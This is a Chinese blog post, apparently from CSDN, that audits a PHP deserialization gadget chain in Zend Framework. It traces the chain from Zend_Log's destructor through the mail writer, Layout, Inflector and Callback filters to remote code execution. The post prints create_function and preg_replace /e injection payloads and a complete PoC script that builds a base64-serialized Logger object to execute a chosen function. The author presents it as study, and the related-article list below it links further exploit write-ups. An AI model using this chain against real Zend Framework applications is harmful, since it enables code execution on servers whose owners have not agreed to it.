Zend FrameWork RCE1

最新推荐文章于 2024-06-24 10:45:59 发布
最新推荐文章于 2024-06-24 10:45:59 发布
阅读量130 收藏
点赞数
分类专栏: 代码审计 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52367015/article/details/125884261
版权

准备

在bin目录执行

zf create prooject web1

application\controllers\IndexController.php写入反序列化接收的参数

在这里插入图片描述

代码审计

library\Zend\Log.php中的__destruct

在这里插入图片描述

这里对_writers(私有的数组变量)遍历并调用shutdown函数

这里直接跟进会发现其调用的是Abstract.php 下的shutdown无参方法

在这里插入图片描述

没法继续向下跟进

所以需要找其他的shutdown方法

这里找到Zend_Log_Writer_Mail这个类的shutdown()

在这里插入图片描述

public function shutdown()
    {
        // If there are events to mail, use them as message body.  Otherwise,
        // there is no mail to be sent.
        if (empty($this->_eventsToMail)) {
            return;
        }

        if ($this->_subjectPrependText !== null) {
            // Tack on the summary of entries per-priority to the subject
            // line and set it on the Zend_Mail object.
            $numEntries = $this->_getFormattedNumEntriesPerPriority();
            $this->_mail->setSubject(
                "{$this->_subjectPrependText} ({$numEntries})");
        }                                    
            

        // Always provide events to mail as plaintext.
        $this->_mail->setBodyText(implode('', $this->_eventsToMail));
        // If a Zend_Layout instance is being used, set its "events"
        // value to the lines formatted for use with the layout.
        if ($this->_layout) {
            // Set the required "messages" value for the layout.  Here we
            // are assuming that the layout is for use with HTML.
            $this->_layout->events =
                implode('', $this->_layoutEventsToMail);

            // If an exception occurs during rendering, convert it to a notice
            // so we can avoid an exception thrown without a stack frame.
            try {
                $this->_mail->setBodyHtml($this->_layout->render());
            } catch (Exception $e) {
                trigger_error(
                    "exception occurred when rendering layout; " .
                        "unable to set html body for message; " .
                        "message = {$e->getMessage()}; " .
                        "code = {$e->getCode()}; " .
                        "exception class = " . get_class($e),
                    E_USER_NOTICE);
            }
        }

前两个if不为空即可

按照定义

在这里插入图片描述

$this->_mail     =>     $this->_mail = new Zend_Mail();
$this->_layout   =>     $this->_layout = new Zend_Layout();

之后进入

$this->_mail->setBodyHtml($this->_layout->render());

跟进render

public function render($name = null)
    {
        if (null === $name) {
            $name = $this->getLayout();
        }

        if ($this->inflectorEnabled() && (null !== ($inflector = $this->getInflector())))
        {
            $name = $this->_inflector->filter(array('script' => $name));
        }

        $view = $this->getView();

        if (null !== ($path = $this->getViewScriptPath())) {
            if (method_exists($view, 'addScriptPath')) {
                $view->addScriptPath($path);
            } else {
                $view->setScriptPath($path);
            }
        } elseif (null !== ($path = $this->getViewBasePath())) {
            $view->addBasePath($path, $this->_viewBasePrefix);
        }

        return $view->render($name);
    }
}

第二个if满足的两个条件

public function inflectorEnabled()
    {
        return $this->_inflectorEnabled;
    }

public function getInflector()
    {
        if (null === $this->_inflector) {
            require_once 'Zend/Filter/Inflector.php';
            $inflector = new Zend_Filter_Inflector();
            $inflector->setTargetReference($this->_inflectorTarget)
                      ->addRules(array(':script' => array('Word_CamelCaseToDash', 'StringToLower')))
                      ->setStaticRuleReference('suffix', $this->_viewSuffix);
            $this->setInflector($inflector);
        }

        return $this->_inflector;
    }

第一个好说,设置为true

第二个保证$this->_inflector 不为空即可

由于$this->_inflector是可控的,所以我们

$name = $this->_inflector->filter(array('script' => $name));

可以调用任意类的filter方法

这里找到三个地方

InflectorPregReplaceCallback中都有filter方法

跟进到Inflector

public function filter($source)
    {
        // clean source
        foreach ( (array) $source as $sourceName => $sourceValue) {
            $source[ltrim($sourceName, ':')] = $sourceValue;
        }

        $pregQuotedTargetReplacementIdentifier = preg_quote($this->_targetReplacementIdentifier, '#');
        $processedParts = array();

        foreach ($this->_rules as $ruleName => $ruleValue) {
            if (isset($source[$ruleName])) {
                if (is_string($ruleValue)) {
                    // overriding the set rule
                    $processedParts['#'.$pregQuotedTargetReplacementIdentifier.$ruleName.'#'] = str_replace('\\', '\\\\', $source[$ruleName]);
                } elseif (is_array($ruleValue)) {
                    $processedPart = $source[$ruleName];
                    foreach ($ruleValue as $ruleFilter) {
                        $processedPart = $ruleFilter->filter($processedPart);
                    }
                    $processedParts['#'.$pregQuotedTargetReplacementIdentifier.$ruleName.'#'] = str_replace('\\', '\\\\', $processedPart);
                }
            } elseif (is_string($ruleValue)) {
                $processedParts['#'.$pregQuotedTargetReplacementIdentifier.$ruleName.'#'] = str_replace('\\', '\\\\', $ruleValue);
            }
        }

        // all of the values of processedParts would have been str_replace('\\', '\\\\', ..)'d to disable preg_replace backreferences
        $inflectedTarget = preg_replace(array_keys($processedParts), array_values($processedParts), $this->_target);

        if ($this->_throwTargetExceptionsOn && (preg_match('#(?='.$pregQuotedTargetReplacementIdentifier.'[A-Za-z]{1})#', $inflectedTarget) == true)) {
            require_once 'Zend/Filter/Exception.php';
            throw new Zend_Filter_Exception('A replacement identifier ' . $this->_targetReplacementIdentifier . ' was found inside the inflected target, perhaps a rule was not satisfied with a target source?  Unsatisfied inflected target: ' . $inflectedTarget);
        }

        return $inflectedTarget;
    }

这里的preg_replace的三个参数都可控

$inflectedTarget = preg_replace(array_keys($processedParts), array_values($processedParts), $this->_target);

结合着

Callback 中的

public function filter($value)
    {
        $options = array();

        if ($this->_options !== null) {
            if (!is_array($this->_options)) {
                $options = array($this->_options);
            } else {
                $options = $this->_options;
            }
        }

        array_unshift($options, $value);

        return call_user_func_array($this->_callback, $options);
    }
}

可以实现call_user_func_array('create_function',["){}phpinfo();exit;/*",'']);

<?php
call_user_func_array('create_function',["){}phpinfo();exit;/*",'']);

实际上也就是实现了phpinfo()

在这里插入图片描述

上面提到的还有一个没有利用的filter方法

Preg_Replace

public function filter($value)
    {
        if ($this->_matchPattern == null) {
            require_once 'Zend/Filter/Exception.php';
            throw new Zend_Filter_Exception(get_class($this) . ' does not have a valid MatchPattern set.');
        }

        return preg_replace($this->_matchPattern, $this->_replacement, $value);

这里的前两个值是可控的,参考深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

原先的语句: preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
变成了语句: preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

2.4.2 RCE 1

<?php

namespace Zend\View\Renderer;
use Zend\Config\Config;

class PhpRenderer
{
    function __construct()
    {
        $this->__helpers = new Config();
    }

}
namespace Zend\Config;

class Config {
    protected $data = [];

    function __construct()
    {
        $this->data = ['shutdown'=>"phpinfo"];
    }
}

namespace Zend\Log;

use Zend\View\Renderer\PhpRenderer;

class Logger
{
    protected $writers;

    function __construct()
    {
        $this->writers = [new PhpRenderer()];
    }

}
echo base64_encode(serialize(new Logger()));

但这里在网上找到的解读文章都不是很详尽……

主要还是想学习一下poc的手法

Ki10Moc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tzwlhack#Vulnerability#CVE-2021-3007 zend framework3 反序列化 rce1
07-25
CVE-2021-3007 zend framework3 反序列化 rce详细分析:
Spring framework deserialization RCE漏洞分析以及利用1
08-08
1. 更新到最新版本的Spring框架,以获取修复的安全补丁。 2. 限制JNDI查找的功能,避免从不受信任的源加载类。 3. 使用安全的序列化库,如JackSON或Gson,它们提供了更安全的反序列化选项。 4. 对所有输入数据进行...
PHP常见后门修复,phpStudy后门RCE,复现/批量脚本/修复
weixin_33416318的博客
03-10 618
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。软件作者声明:phpstudy 2016版PHP5.4存在后门。实际测试官网下载phpstudy2018版php-5.2....
Zend Framework 3.1.3 gadget chain
why811的博客
10-11 230
在推特上的账号发布了一条消息。一个名为Zend Framework的php框架出现了新的,可导致RCE。笔者尝试复现,但失败了。所幸,我基于此链,发现在这个框架的最新版本中的另一条链。
【安全】vulnhub实验dc1
qq_43017750的博客
12-23 2511
靶机下载链接:https://download.vulnhub.com/dc/DC-1.zip 主机发现 首先使用nmap发现网络中存活的主机 发现了目标主机192.168.56.101 ┌──(kali㉿kali)-[~] └─$ sudo nmap -sP -sn -n -T4 --host-timeout 5 192.168.56.0/24 [sudo] password for kali: Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-23
DBShop后台RCE之曲线救国
weixin_30873847的博客
07-09 222
本文最早发布在朋友的公众号 黑客信徒 中,文章是自己写的 不存在抄袭 特此申明 --------------------- 前言 DBShop是一款基于ZendFramework2框架的电子商务系统,最近在对DBShop做代码审计过程中发现了一个后台RCE的漏洞,由于是后台漏洞本身并不是很严重,但是发现过程较为曲折,决定还是记录下来,希望能给新入门代码审计的小伙伴一些思路。 正文 ...
PHPMailer / Zend-mail / SwiftMailer - Remote Code Execution Exploit
收集盒 Book box
03-05 3281
#!/usr/bin/python intro = """\033[94m __ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ _
PHP-JAVA-Python-JavaScript框架介绍&CVE-2018-1002015/CNVD-2018-24942/2x-rce/Spring命令执行/CVE-2021_21234漏洞复现
weixin_54882883的博客
07-26 1726
假如我们要买一台电脑。框架为我们提供了已经装好的电脑,我们只要买回来就能用,但你必须把整个电脑买回来。这样用户用起来自然轻松许多,但是我们这电脑没有软件其他,会导致很多人用一样的电脑,太死板了就个了一个浏览器什么都不能安装,这适合呢你想自定义某个部件将需要修改这个框架,就需要用到库了,而库就如自己组装的电脑。库为我们提供了很多部件,我们需要自己组装,如果某个部件库未提供,我们也可以自己做。库的使用非常灵活,但没有框架方便。所以说在库和框架是不能分开滴好兄弟。...
php5.3.29远程代码_利用PHP V5.3名称空间获取可读和可维护的代码
cuxiong8996的博客
07-03 729
“柯南是我的榜样。” 如果我在餐桌上发表这样的声明,我的儿子会立即以为我模仿了蛮族的柯南,而我的妻子则以为我想成为深夜脱口秀主持人柯南·奥布莱恩。 这种上下文混淆在IT中被称为名称冲突。 许多语言都有规避名称冲突的策略,而在V5.3中,PHP也是如此。 PHP通过其新的名称空间功能解决了名称冲突问题。 当然,PHP用来解决冲突的名称不是人的名字,而是类,函数和常量的名字。 本文解释了为什么...
【废了-准备删除02】信息收集——基于WAMP的drupal7.x管理系统
Fighting_hawk的博客
03-23 9714
1.本节内容对目标站点进行信息收集,包括IP、端口、目录、指纹等,为后续渗透测试提供了方向。 2. 对于139端口,是samba服务端口,可以考虑爆破、未授权访问、远程代码执行。 3.对于445端口,是SMB服务端口,可以考虑空会话攻击。 4.对于3306端口,可以考虑注入、提权、爆破。 5. 对于80端口,可以考虑Web 攻击、爆破、对应服务器版本漏洞。...
FreakOut僵尸网络传播事件通告
爱国小白帽
01-21 723
报告编号:B6-2021-012101 报告来源:360CERT 报告作者:360CERT 更新日期:2021-01-21 0x01 事件描述 2020年1月20号,360CERT监测发现 CheckPoint 发布了 FreakOut –利用最新漏洞创建僵尸网络 的分析报告。FreakOut恶意程序利用近期新出的三个漏洞实施扫描,并创建僵尸网络。事件等级: 高危 ,事件评分: 8.5 。 对此,360CERT建议广大用户好资产自查以及预防工作,以免遭受黑客攻击。 0x02 风险等级 360CERT对该事.
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
phpstudy_rce.py
10-11
phpstudy_rce
x微E-Cology WorkflowServiceXml RCE1
08-03
x微E-Cology WorkflowServiceXml RCEx 微 E-Cology WorkflowServiceXml RCEx 微 E-Cology
[极客大挑战 2020]Roamphp4-Rceme
不会编程的崽的博客
06-20 363
右键源代码里给了提示,有备份文件index.php.swp,大伙都做到这来了,应该不用写了吧。加这个[~%FF]只是因为php7的解析方式,当然换成其他的也可以例如[~%EF] [~%CF]passthru(next(getallheaders()));然后,需要要绕过两层,多年rce经验,相信你一眼能看出。我们由内往外构造,这里需要前置知识(贴其他大佬的吧)知道原因可以在评论区踢我一脚。
深入了解PHP的If...Else语句
Perfect—完美的博客
06-20 495
if…else语句用于根据条件执行不同的代码块。if (条件) {// 当条件为真时执行的代码} else {// 当条件为假时执行的代码if…else语句是PHP中最基础也是最重要的控制结构之一。通过使用if、if…else、if…elseif…else以及嵌套if语句,可以实现复杂的条件判断逻辑。条件运算符和switch语句提供了更加简洁和高效的代码写法。掌握这些控制结构的用法,将有助于你编写更加灵活和健壮的PHP代码。
深度解析SD-WAN在企业组网中的应用场景
TIANGEKUAJING的博客
06-21 366
在现代企业快速发展的网络环境中,SD-WAN技术不仅是实现企业各站点间高效连接的关键,也是满足不同站点对互联网、SaaS云应用和公有云等多种业务需求的理想选择。本文将从企业的WAN业务需求出发,对SD-WAN的组网场景进行全面解析,涵盖多种业务情境。
discuz插件之优雅草超级列表互动增强v1.2版本更新
最新发布
qq_21592105的博客
06-24 324
title]20220617 v1.2发布[/title]增加了对php8的支持 增加了 对discuz3.5的支持。discuz插件之优雅草超级列表互动增强v1.2版本更新。
fastjson rce
09-16
Fastjson RCE(Remote Code Execution)是指在使用Fastjson这个Java库时,存在远程代码执行的风险。在Fastjson版本1.2.24及以下的版本中,存在RCE问题。这个问题是由于Fastjson引入了AutoType特性,但在安全方面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值